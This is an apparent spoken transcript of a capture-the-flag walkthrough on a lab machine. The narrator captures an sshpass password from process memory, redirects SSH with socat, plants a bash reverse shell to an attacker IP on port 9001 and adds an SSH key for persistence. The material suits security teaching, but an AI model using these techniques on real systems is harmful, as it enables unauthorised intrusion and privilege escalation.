Let's see. SSHPass hide password standard in. I know there's still a vulnerability with it. So I'm just going to try running PSPY real quick. So we'll try PSPY first. And then if PSPY does not get this, then we're going to try to create our own version. And when we create our own version, we just be going through the proc table to see if we can find any artifact that SSHPass does not overwrite. So again, it's going back into kind of its memory, how it starts to change up its command line. So let's see. wget 10.10.14.3. What was it? PSPY 64S. And we have to start that. Move downloads to PSPY 64S. chmod +x. See what this says. This may be able to grab it. This is just a crappy like bash loop, which may not be fast enough to grab it before it overwrites. So this could be better. Let's see, grep SSHPass output, cd temp, grep SSHPass output. Cat output grep-i sh grep-v z's. So we don't have anything there. Let's see. SSHPass nothing. Still all Z's. Let's see. -H. We can try changing the interval. So default is 100 milliseconds. Let's change it to 10 and see if this works. So we're just waiting now for the 10 seconds to come and to run everything again. And just looking back at SSHPass, I think I saw all Z's yet again. So I can try letting it go one more time. And then let's look at SSHPass. No. So if we can't get this through PSPY, oh, there we go. Finally. So we have it going right now. And again, all it does, SSHPass, in this option, it's going to just overwrite the memory and take whatever length you have and replace it with Z's. However, there is a timing condition where you can get there before it actually does that. And if you do, you get this, and you can see the password. So we can do SSHPass, this, and root at 172.18.02. So root at 172.18.02. And if we do SSHPass correctly, fail to run command, maybe we'll just do bash. Let's just SSH. SSH root at 172.18.02. Put the password, and we'll root in this container. So there is a feeds, and we can look at these files. So API v2 looks like serialized content. Back in here, it's getting data from various places and going to the feed engine. So that's what I'm guessing this is. So if we look back, it's probably in temp output. cd temp cat output. Let's see, grep SSHPass. And let's do ~S to disable line wrapping. So we can see what it does. It's going to SCP a file over to 172.18.0.2, and then it's going to try to execute it. So what happens if it tries, instead of going to 172.18.0.2 every 10 seconds, if it actually goes back to itself? And because we are root on that container, we can actually do that. So looks like the container closed. Do I still have my clipboard? Can I log in? Okay. And we can do that because we are root, and we can just turn off SSH. And by turning off SSH, we can download a static binary, so static socat binary, and download it, save it to file, and let's move downloads socat to www and go into www, and we can download socat. So wget 10.10.14.3/socat, and that should download it if we're listening. So Python 3-m HTTP server 80. So we'll run it, and then once it's executed, it looks like it already existed. So we can do /socat, and it requires two addresses. So we can say TCP listen on port 22, fork reuse address, and then TCP 172.18.0.1 port 22. So now the server is pointed back at itself. So when you try to SSH, we're going to get this host identification failed. But if something funky happens, and maybe they just accept it, we may get logged in. So let's do vclear.sh and bin bash, and I'm going to do bash-c --i dev tcp 10.10.14.3 9001 0 at and 1 chmod plus x and nclvnp 9001. So we're just going to wait here, and I'm going to make a backup of this file in case we have to. Okay. So I can do watch-n1 cat clear.sh, and I just did this to see if this file ever changes its contents. So hopefully it'll pull this and execute it. I'm not 100% positive, but we'll see. Oh, there we go. So now we have it, and we are root on this box. If we go .ssh, I want to play with this real quick. So we can Control-C out of this, cat SSH authorized keys, and we're going to copy a key to this box. V authorized keys. Ah, shoot. Did I just do that? Did it right? We'll see. We can exit this shell, and we can say SOLR at root. Hey, it did. Sweet. So I want to try something. SSH root at 172.18.02. Who am I? So I don't know exactly why this is happening. Because it didn't happen when we were the SOLR user, right? When we were SOLR, SSH -i SOLR at 172.18.02. 10.10.10.201. If I take this command and run it, we give permission denied. So what is happening here? Cat SSH config. There is no config. Maybe it's an IDRSA file. SSH cp IDRSA and authorized keys to SOLR.sh. SOLR.sh ch own SOLR. Now we have to do that bind again. Grab this password. Paste. We can socat service sh stop. Okay, so it looks like maybe because keyboard password authentication is disabled, even though this host identification has changed, it's still working. Let's see, it's possible. Let's see, 02. Yeah. So even though that prompt's coming up, nothing's happening. I'm not 100% positive what the configuration on this box is, but yeah, it's just telling us the host key has changed and then saying, I don't care, I'm just going to go log in. So this IDRSA file in here is duplicated on this Docker container, I think. Or it's not duplicated, but there's the authorized keys. So that IDRSA can log in. So I'm guessing this key is in that Docker. So AAAB3, it ends in WXM. Less Maybe it never logs in successfully to begin with. But yeah, that's what's happening. Weird behavior because, yeah. But hope you guys enjoyed the box. Take care, and I will see you all next week.